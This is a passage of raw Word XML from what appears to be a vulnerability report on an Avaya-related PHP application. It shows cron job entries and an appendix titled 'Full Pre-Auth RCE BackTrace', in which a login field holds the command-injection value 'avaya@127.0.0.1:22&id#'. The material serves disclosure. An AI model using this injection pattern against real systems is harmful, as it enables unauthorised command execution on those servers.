              <w:t>#*/30 * * * * root /opt/util/bin/Get_CM_CDRs.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BFA2019" w14:textId="1D16D731" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F16EDB7" w14:textId="31A04169" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CDR_Monthly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5DAA7725" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6FA9B568" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA1575B" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># wi00338331 - Removal of superfluous </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> e-mails.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A13293" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271DF630" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># run Monthly CDR E-mail Jobs on the 1st of the Month at 02:00.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="437A5F89" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">#00 2 1 * * </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /opt/util/bin/CDR_Monthly.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AFEB47" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2865DB64" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CDR_Daily</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="669E54E8" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="632C305B" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3147F85D" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># wi00338331 - Removal of superfluous </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> e-mails.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310FD171" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E2A4BB" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># run Daily CDR E-mail Jobs once a day at 02:00.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F5DD090" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">#00 2 * * * </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /opt/util/bin/CDR_Daily.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BADB600" w14:textId="72931371" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66E71296" w14:textId="2602074F" w:rsidR="00A70677" w:rsidRDefault="00A70677" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E2C4D4" w14:textId="4E5E3B89" w:rsidR="002A5BD7" w:rsidRDefault="00A70677" w:rsidP="00A70677">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Ref58911292"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix 1: Full Pre-Auth RCE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BackTrace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="465A3D8F" w14:textId="77777777" w:rsidR="00A70677" w:rsidRPr="005B45A1" w:rsidRDefault="00A70677" w:rsidP="005B45A1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B45A1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F3225C" w14:paraId="58DBAE16" w14:textId="77777777" w:rsidTr="00F3225C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7EB25EFA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF2869F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  0 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42234785" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7B9746"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SMSTestController.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46675017" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 61,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04785F45" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>invokeSMS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EB9689" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FACFA7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FCF0E4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12B22FA6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58DABE75" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC96F76" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC5DD5A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC9BD94" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Login' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7AC895"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346DD299" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Login',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74350295" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B10784" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="127A1053" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD0EA8F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'CM Login ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC368CF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F98A697" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'avaya@127.0.0.1:22&amp;id#',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3BBD15" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D19A62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="181C6D95" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Password' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A4A7A7"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8C05FD2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3728F74C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A3E9B0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6048DEED" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="669D09B4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="318A35E7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E42ADE5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F15EEE6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077ADD0D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7EF9FE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Model' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15493694"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34BF932C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="347DDCCC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8C4178" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB87DC0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 30,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BCEA77" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487BCE84" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AE7E63" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AARAnalysis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51336D09" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
